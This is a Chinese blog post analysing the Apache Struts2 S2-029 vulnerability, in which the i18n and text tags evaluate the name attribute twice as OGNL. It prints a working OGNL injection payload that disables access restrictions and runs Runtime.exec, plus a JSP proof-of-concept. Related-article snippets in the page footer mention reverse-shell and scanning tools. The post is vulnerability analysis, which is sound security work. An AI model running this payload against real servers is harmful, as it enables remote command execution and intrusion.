S2-029 Struts2 标签远程代码执行分析(含POC)

最新推荐文章于 2024-03-14 10:19:36 发布
最新推荐文章于 2024-03-14 10:19:36 发布
阅读量1.7k 收藏
点赞数
分类专栏: Struts java
java 同时被 2 个专栏收录
228 篇文章 0 订阅
订阅专栏
Struts
3 篇文章 0 订阅
订阅专栏

0×00  标签介绍

Struts2标签库提供了主题、模板支持,极大地简化了视图页面的编写,而且,struts2的主题、模板都提供了很好的扩展性。实现了更好的代码复用。 Struts2允许在页面中使用自定义组件,这完全能满足项目中页面显示复杂,多变的需求。

Struts2的标签库有一个巨大的改进之处,struts2标签库的标签不依赖于任何表现层技术,也就是说 strtus2提供了大部分标签,可以在各种表现技术中使用。包括最常用的jsp页面,也可以说 Velocity 和FreeMarker等模板技术中的使用。

0×01 漏洞分析

struts2的i18n,text标签的 name属性处理的时候会经过两次ognl执行,从而导致远程代码执行。

标签使用如下所示:

<s:i18nname="%{#request.lan}">xxxxx</s:i18n>
<s:textname="%{#request.lan}">xxxxx</s:text>

上面两个标签name属性都存在问题 下面对i18n标签做分析

跟踪i18n标签name 属性在代码中的处理:

org.apache.struts2.components.I18n
......
public boolean start(Writer writer) {
boolean result = super.start(writer);
try
{
String name = findString(this.name,"name", "Resource bundle name is required. Example: foo orfoo_en");//i18nname属性进行ognl执行并将结果赋值给name
ResourceBundle bundle = (ResourceBundle)findValue("getTexts('"+ name + "')");//对上面获取的name属性继续做ognl表达式执行
......
}
}

其中对findString方法进行跟踪,则可以跟踪到

com.opensymphony.xwork2.ognl.OgnlValueStack的protected Object findValue(Stringexpr, String field, String errorMsg) 方法,该方法是用来执行ognl表达式。

其中findValue方法进行跟踪,则可以跟踪到

com.opensymphony.xwork2.ognl.OgnlValueStack的public Object findValue(Stringexpr, boolean throwExceptionOnFailure) 方法,该方法也是用来执行ognl表达式。

测试流程:

假设设置request的lan 属性为:

'),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#a=@java.lang.Runtime@getRuntime(),#a.exec('touch/tmp/dbapptest'),new java.lang.String('

其中运行的ognl表达式为%{request.lan}, 则第一次ognl表达式执行结果为:

'),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#a=@java.lang.Runtime@getRuntime(),#a.exec('touch/tmp/dbapptest'),new java.lang.String('

执行完成之后name的值为:

'),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#a=@java.lang.Runtime@getRuntime(),#a.exec('touch/tmp/dbapptest'),new java.lang.String('

然后将name值传入下面一行代码执行ognl, 其中ognl表达式为

getText(''),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#a=@java.lang.Runtime@getRuntime(),#a.exec('touch/tmp/dbapptest'),new java.lang.String('')

从而导致命令执行在/tmp目录下生成dbapptest 文件

其中poc中需要设置#_memberAccess['allowPrivateAccess']=true 用来授权访问private方法,

#_memberAccess['allowStaticMethodAccess']=true 用来授权允许调用静态方法,

#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties']用来将受限的包名设置为空

#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties']用来将受限的类名设置为空

#a=@java.lang.Runtime@getRuntime(),#a.exec(‘touch/tmp/dbapptest’),new java.lang.String(”)执行系统命令

0×02 漏洞poc

<%@pageimport="java.util.HashSet"%>
<%@ pagecontentType="text/html;charset=UTF-8" language="java" %>
<%@ taglib prefix="s"uri="/struts-tags" %>
<html>
<head><title>Demo jsppage</title></head>
<body>
<%
request.setAttribute("lan", "'),#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#a=@java.lang.Runtime@getRuntime(),#a.exec('touch/tmp/fuckxxx'),new java.lang.String('");
%>
<s:i18nname="%{#request.lan}">xxxxx</s:i18n>
</body>
</html>

http://www.freebuf.com/vuls/99432.html


JIESA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-Apache Struts2远程代码执行漏洞(S2-029)复现
JimWu的博客
09-04 1073
Apache Struts2远程代码执行漏洞(S2-029)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理:由于在标记属性中对原始用户输入进行评估时,强制双OGNL评估导致远程代码执行。 1.打开靶场,了解一下S2-029漏洞的原理。 2.构造POC执行命令ls查看文件。 (#_memberAccess[‘allowPrivateAcces...
struts S2-005 远程代码执行漏洞
haha1314的博客
07-15 2243
S2-005 远程代码执行漏洞 影响版本: 2.0.0 - 2.1.8.1 漏洞详情: http://struts.apache.org/docs/s2-005.html 原理 参考吴翰清的《白帽子讲Web安全》一书。 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OG...
S2-029 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 1409
概述 struts2 029漏洞已经爆出一段时间,网上有一些相关分析,首先,漏洞确定是出现在OGNL解释执行的过程,具体漏洞测试poc网上已经有很多,我在2.2.1、2.3.24.1、2.3.25、2.5beta3、2.3.26上面测试都可以执行,不过修改的安全参数稍微不同。 2.2.1只需要下面几个: #_memberAccess['allowPrivateAccess']=true #...
【渗透测试】Struts2系列漏洞
热门推荐
weixin_53972936的博客
10-29 1万+
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
Java8之反射源码
CRUD工程师
03-05 824
参考资料: 《深入理解java反射原理》 《深入理解 Java 反射和动态代理》 《JAVA反射机制及理解》 前文: 《Java8之反射》 写在开头:本文为学习后的总结,可能有不到位的地方,错误的地方,欢迎各位指正。 一、反射使用实例 // person.java public class Person { // 其余省略... public Person() { System.out.println("调用默认构造函数");
struts2漏洞集合
angaoux03775的博客
10-27 1753
[+]1 S2-005 CVE-2010-1870CVE-2010-1870 影响版本:Struts 2.0.0 – Struts 2.1.8.1 官方公告:http://struts.apache.org/release/2.2.x/docs/s2-005.html ('\43_memberAccess.allowStaticMethodAccess')(a)=true...
墨者靶场 初级:Struts2远程代码执行漏洞(S2-004)
qq_43233085的博客
01-14 765
墨者靶场 初级:Struts2远程代码执行漏洞(S2-004)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。不知道运维人员是否修补了漏洞。 实训目标 1、了解Apache Struts2框架; 2、了解Apache Struts2目录遍历漏洞(S2-004); 3、...
Struts2远程代码执行漏洞分析S2-013)1
08-08
Struts2 远程代码执行漏洞分析S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞是由于 Struts2标签库未正确地处理用户提交的数据,导致可以通过 OGNL 表达式执行恶意代码。攻击者可以通过构造恶意的 OGNL 表达式,执行任意的 Java 代码,导致远程代码执行漏洞...
Struts2 s2-061 Poc分析1
08-03
Struts2 s2-061 是一个关于 Apache Struts2 框架的安全漏洞,具体为 OGNL(Object-Graph Navigation Language)表达式注入导致的远程代码执行问题。这个漏洞(CVE-2020-17530)在2020年12月8日被公开,影响了使用...
struts扫描及利用工具(2018-11新版)
11-30
# struts-scan 快速检测struts命令执行漏洞,可批量。 # 运行环境 MAC/Linux下的Python2 # 支持对以下版本的检测 ST2-005 ST2-008 ST2-009 ST2-013 ST2-016 ST2-019 ST2-020 ST2-devmode ST2-032 ST2-033 ST2-037 ST2-045 ST2-046 ST2-048 ST2-052 ST2-053 ST2-057 # 使用 ![image](./images/poc.png) ![image](./images/exp.png) # 增加 [+]针对各版本的shell命令交互 [+]struts2-052检测(利用后面会加上) [+]struts2-053检测+利用(需要提供参数) [+]检测过程中输出超时原因 [+]兼容HTTP/1.0,修复了struts-045检测不准确的问题 [+]struts2-046检测+利用 [+]修改struts2-048的payload [+]针对某些超时的情况,注释掉 httplib.HTTPConnection._http_vsn = 10 和httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'这两行再测试一遍,因为有的可能不支持HTTP/1.0的协议。 [+]增加linux和win的可执行文件,windows需要.NET环境。 [+]增加写入文件功能,针对有漏洞的struts版本号会自动写入success.txt文件。 [+]增加struts2-057检测和利用,生产环境还没有找到可利用的例子,实属鸡肋的洞,参考https://github.com/Ivan1ee/struts2-057-exp。 # 特别说明 此工具仅限于漏洞验证,如若使用者引起相关的法律责任请自负,开发者不承担连带责任。
CVE-2020-17530:S2-061 的payload,以及对应简单的PoCExp
04-25
S2-061 脚本皆根据vulhub的struts2-059/061漏洞测试环境来写的,不具普遍性,还望大佬多多指教 struts2-061-poc.py(可执行简单系统命令) 用法:python struts2-061-poc.py command 例子:python struts2-061-poc.py whoami S2-061-shell.py(可反弹shell) 用法: 首先在一台机器A上监听指定端口(例如:nc -lvvp 7777) 执行脚本:python2 S2-061-shell.py target_url,其中target_url为漏洞环境地址,形式为 根据脚本提示输入A机器的IP及所监听的端口,即可在机器A的监听窗口获取到shell 以下是几个大佬搞出来的payload: payload-1:(from ka1n4t) %{(#instancemanager=#a
Struts2 S2-020在Tomcat 8下的命令执行分析1
08-08
该漏洞允许远程攻击者通过OGNL(Object-Graph Navigation Language)表达式执行任意系统命令,从而可能导致拒绝服务(DOS)、敏感信息泄露、文件下载甚至完全的远程代码执行(RCE)。在Tomcat 8环境下,由于其特定的...
S2-057-poc
08-23
S2-057漏洞,也称为CVE-2018-11776,是Struts2框架中的一个严重安全漏洞,允许远程代码执行(RCE),可能导致攻击者能够完全控制受影响的系统。这个漏洞主要出现在Struts2的Struts REST插件中,当用户通过HTTP头发送...
Strust2远程代码执行漏洞(S2-033)利用分析
煜铭2011
06-14 4234
5月12日,Struts官方发布安全公告称,Apache Strut2 REST插件存在漏洞,可以远程执行任意指令,该漏洞编号为S2-033(CVE-2016-3087 ),公告详情如下: 启明星辰ADLab通过分析发现,该漏洞依附于前一段时间闹得沸沸扬扬的S2-032漏洞,Struts官方发布的S2-033安全公告只是针对性地对REST插件功能存在的安全问题进行补充,其漏洞技术
0x27.Apache Struts2远程代码执行漏洞(S2-029)复现
qq_31679787的博客
10-21 679
s2-029:强制使用Apache Struts框架时,会对分配给某些标签的属性值进行双重评估,因此可以传递将在呈现标签属性时再次评估的值 打开源代码发现传递的参数为message; poc: (#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAcces...
Struts2框架漏洞总结与复现(下)
剁椒鱼头没剁椒的博客
02-08 1818
Apache Struts 1插件的Apache Struts 2.3.x 版本中存在远程代码执行漏洞,该漏洞出现于Struts2的某个类中,该类是为了将Struts1中的Action包装成为Struts2中的Action,以保证Struts2中的Struts1插件启用的情况下,远程攻击者可通过使用恶意字段值,构造特定的输入,发送到ActionMessage类中,从而导致任意命令执行,进而获取目标主机系统权限。在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。
s2-029 Struts2 标签远程代码执行分析(POC)
angaoux03775的博客
03-18 204
1、标签介绍 Struts2标签库提供了主题、模板支持,极大地简化了视图页面的编写,而且,struts2的主题、模板都提供了很好的扩展性。实现了更好的代码复用。Struts2允许在页面中使用自定义组件,这完全能满足项目中页面显示复杂,多变的需求。 Struts2标签库有一个巨大的改进之处,struts2标签库的标签不依赖于任何表现层技术,也就是说strtus2提供了大部分标签,可以...
Struts2 远程代码执行漏洞复现(S2-001)
最新发布
Welcome To Myon'Blog !
03-14 1144
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
Struts2 S2-029漏洞分析远程代码执行机制
"本文主要探讨了Struts2框架中的S2-029远程代码执行漏洞,该漏洞利用了Struts2对OGNL表达式的不安全处理。文章介绍了Struts2标签库的工作原理,以及如何通过OGNL进行数据访问。同时,文章分析了触发该漏洞的途径和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值